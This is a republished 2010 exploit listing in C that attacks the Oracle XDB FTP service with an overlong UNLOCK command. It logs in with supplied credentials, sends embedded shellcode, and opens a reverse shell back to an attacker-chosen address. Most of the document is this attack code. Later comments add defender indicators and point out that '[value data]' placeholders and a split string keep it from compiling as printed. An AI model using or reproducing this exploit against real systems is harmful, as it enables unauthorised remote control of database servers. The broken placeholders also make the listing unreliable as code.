Oracle XDB FTP service UNLOCK buffer overflow exploit that spawns a reverse shell
来源:vfocus.net 作者:mc2_s3lector 发布时间:2010-03-18  
[+] vulnerabilities network level/stack based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==>windows XDB
[+] connecting:8080
[=] operation: win 32-->xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com	


exploit win32
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
   
/*
 * Forward declarations for the three stages run from main():
 * Winsock init + target resolution, payload patching, and the FTP session.
 */
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
   
/* Target address; filled in by StartWinsock() from the global `host`
 * (sin_port is set later, in GainControlOfOracle()). */
struct sockaddr_in s_sa;
/* gethostbyname() result (StartWinsock); set to a non-NULL dummy value on the
 * numeric-address path. */
struct hostent *he;
/* Numeric form of `host` when it is not a hostname (StartWinsock). */
unsigned int addr;
/*
 * Target host, copied from argv[1] in main() with strncpy(..., 250).
 * NOTE: `[value data]` here and below is a placeholder in the published
 * listing, not valid C — the real array sizes and indices are not shown, so
 * this file does not compile as printed.
 */
char host[value data]="";
   
// register access (author's note). The original comment line ended in "\\",
// i.e. a backslash line continuation, which would swallow the following
// declaration into the comment.
/*
 * Payload bytes. main() appends them to exploit_code; SetUpExploit()
 * overwrites positions (indices not shown) with the connect-back IP and the
 * complemented port; GainControlOfOracle() sends the result to the target.
 * Treat as opaque machine code — nothing below decodes it.
 * Defender view: per the title, the payload opens a connection from the
 * database host back to the attacker-supplied ipaddress:port, so an outbound
 * TCP connection originating from the XDB FTP service process is the
 * host/network indicator to alert on.
 */
unsigned char exploit[value data]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
"\xFF\xFF\xFF\xFF";
   
/*
 * The FTP line that triggers the overflow: an UNLOCK command whose argument
 * is padded to an overlong length ("put character" is the listing's
 * placeholder for the padding bytes). main() then strcat()s short_jump,
 * exception_handler, exploit and "\r\n" onto it with no check against this
 * array's declared size (itself a placeholder), so the tool can overflow its
 * own buffer.
 * Defender view: the wire-level signature is an FTP UNLOCK line on the XDB
 * FTP port (2100, see GainControlOfOracle) far longer than any legitimate
 * path; mitigation is the vendor fix, or disabling/firewalling the XDB FTP
 * listener where it is not needed.
 */
char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character"  	--------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";
   
/* Fixed 4-byte values appended after the padding (names are the author's):
 * a short jump and an address that replaces an exception handler. Being
 * hard-coded, they are specific to one Windows/Oracle build; the listing
 * does not say which. */
char exception_handler[value dataX]="\x79\x9B\xf7\x77";
char short_jump[value dataX]="\xEB\x06\x90\x90";
   

/*
 * Entry point. Arguments: host userid password ipaddress port
 *   host            target running the XDB FTP service (copied to global `host`)
 *   userid/password FTP credentials used by GainControlOfOracle()
 *   ipaddress/port  where the payload connects back; patched in by SetUpExploit()
 * Returns 0 after the session (or on wrong argument count), or printf()'s
 * character count when Winsock init fails — the printf return value is used
 * as the process exit status.
 */
int main(int argc, char *argv[])
{
     
     if(argc != 6)
     {
          printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
          printf("\n\n\tSpawns a reverse shell to specified port");
          printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
          printf("\n\t6th maret 2010\n\n\n");
          return 0;
     }
   
     /* strncpy() writes no terminator when argv[1] is 250+ chars; `host` is a
      * zero-initialised global, so this is only safe if its (unshown) size
      * exceeds 250 bytes. */
     strncpy(host,argv[1],250);
     if(StartWinsock()==0)
          return printf("Error starting Winsock.\n");
   
     /* atoi() yields 0 for a non-numeric port and reports no error. */
     SetUpExploit(argv[4],atoi(argv[5]));
   
     /* Build the final FTP line in place: padding + jump + handler address +
      * payload + CRLF. None of these strcat() calls is bounded by the declared
      * size of exploit_code (a placeholder in this listing). */
     strcat(exploit_code,short_jump);
     strcat(exploit_code,exception_handler);
     strcat(exploit_code,exploit);
     strcat(exploit_code,"\r\n");
   
     /* Return value (0 or a printf() count on failure) is ignored. */
     GainControlOfOracle(argv[2],argv[3]);
          
     return 0;
   
}          
   

/*
 * Patch the connect-back address into the payload bytes.
 *   myip   dotted-quad string. inet_addr()'s result is not checked, so an
 *          invalid string (INADDR_NONE, all 0xFF) is patched in silently.
 *   myport TCP port a listener (the author's comment suggests netcat) waits on.
 * The port is stored complemented (XOR 0xFFFF) after htons(); presumably the
 * payload undoes this, but that is not verifiable here. The indices written
 * into exploit[] are placeholders in this listing. Always returns 0.
 * (The trailing "--->protocol" on the signature line is a stray annotation
 * from the published page, not C.)
 */
int SetUpExploit(char *myip, int myport)--->protocol
{
     unsigned int ip=0;
     unsigned short prt=0;
     char *ipt="";   /* only a placeholder initialiser; reassigned below */
     char *prtt="";
   
     ip = inet_addr(myip);
   
     /* Copy the 4 address bytes in network order into the payload. */
     ipt = (char*)&ip;
     exploit[value data]=ipt[0];
     exploit[value data]=ipt[1];
     exploit[value data]=ipt[2];
     exploit[value data]=ipt[3];
   
     // set the TCP port to connect on
     // netcat should be listening on this port
     // e.g. nc -l -p 80
   
     prt = htons((unsigned short)myport);
     prt = prt ^ 0xFFFF;   /* stored complemented; reason not shown in this file */
     prtt = (char *) &prt;
     exploit[value data]=prtt[0];
     exploit[value data]=prtt[1];
   
     return 0;
}
   

/*
 * Initialise Winsock 2.0 and resolve the global `host` into s_sa.
 * Returns 1 on success, 0 on failure (WSAStartup error, wrong version, or a
 * NULL hostent); main() tests for 0.
 * Defects visible here:
 *  - isalpha(host[0]) on a plain char is undefined for negative values;
 *    cast to unsigned char first.
 *  - On the hostname path he->h_addr is dereferenced (memcpy below) before
 *    the NULL check at the end, so an unresolvable name crashes instead of
 *    returning 0. On the numeric path `he` is set to a dummy non-NULL value,
 *    so that final check never fires there either.
 *  - inet_addr() is not checked for INADDR_NONE.
 *  - h_addrtype is not checked; h_length bytes are copied into a 4-byte
 *    sin_addr, which is only correct for AF_INET results.
 */
int StartWinsock()
{
     int err=0;
     WORD wVersionRequested;
     WSADATA wsaData;
   
     wVersionRequested = MAKEWORD( 2, 0 );
     err = WSAStartup( wVersionRequested, &wsaData );
     if ( err != 0 )
          return 0;
     /* Require exactly version 2.0; anything else is treated as failure. */
     if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
       {
          WSACleanup( );
          return 0;
     }
   
     /* Crude hostname-vs-address switch: a leading letter means DNS lookup. */
     if (isalpha(host[0]))
     {
          he = gethostbyname(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          /* NULL `he` (lookup failure) is dereferenced here, before the check below. */
          memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
       }
     else
     {
          addr = inet_addr(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,&addr,4);
          he = (struct hostent *)1;   /* dummy non-NULL so the check below passes */
     }
   
     if (he == NULL)
       {
          return 0;
       }
     return 1;
}
   

   
/*
 * Run the FTP session against the target: connect to s_sa on TCP 2100 (the
 * XDB FTP listener), log in with USER/PASS, then send exploit_code.
 *   user, pass  FTP credentials; each is appended with strncat(..., 230) to
 *               a buffer whose declared size is a placeholder here, so the
 *               bound cannot be checked (it needs at least 5+230+2+1 bytes).
 * Returns 0 after sending, or printf()'s character count on socket, connect
 * or login failure; main() ignores the result either way.
 * Robustness notes: recv()/send() results are stored but never examined
 * (a -1 leaves resp untouched, tolerable only because resp is zeroed each
 * round); r_addr is filled in but never used; the failed-login message
 * prints the password to stdout, so it lands in any captured output or log.
 * Defender view: on the target this appears as an FTP login on the XDB
 * service followed by an UNLOCK command with an abnormally long argument;
 * per the title the payload then connects out from the database host.
 */
int GainControlOfOracle(char *user, char *pass)
{
   
     char usercmd[value dataXX]="user ";
     char passcmd[value dataXX]="pass ";
     char resp[1600]="";   /* recv() reads at most 1500, leaving a NUL margin for printf("%s") */
     int snd=0,rcv=0;
     struct sockaddr_in r_addr;   /* set below but never passed to any call */
     SOCKET sock;
   

     strncat(usercmd,user,230);
     strcat(usercmd,"\r\n");
     strncat(passcmd,pass,230);
     strcat(passcmd,"\r\n");
   

     sock=socket(AF_INET,SOCK_STREAM,0);
     if (sock==INVALID_SOCKET)
         return printf(" sock error");
   
     r_addr.sin_family=AF_INET;
     r_addr.sin_addr.s_addr=INADDR_ANY;        
     r_addr.sin_port=htons((unsigned short)0);
     /* Hard-coded destination port of the Oracle XDB FTP service. */
     s_sa.sin_port=htons((unsigned short)2100);
   
     
     if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
          return printf("Connect error");
   
     /* Banner, then USER and PASS exchanges; each reply is echoed and cleared. */
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, usercmd , strlen(usercmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, passcmd , strlen(passcmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     /* A 5xx FTP reply is a permanent failure; anything else is taken as logged in. */
     if(resp[0]=='5')
     {
          closesocket(sock);
          /* The string literal below is split across two lines in the published
           * listing and will not compile as printed; it also echoes the password. */
          return printf("Failed to log in using user %s and password 
%s.\n",user,pass);
     }
     ZeroMemory(resp,1600);
   
     /* Send the overlong UNLOCK line built in main(); send() result unchecked. */
     snd=send(sock, exploit_code, strlen(exploit_code) , 0);
   
     /* Give the server time before tearing the connection down. */
     Sleep(2000);
   
     closesocket(sock);
     return 0;
}


Big thanks to:
================================================================================
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign COmputer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano
================================================================================

 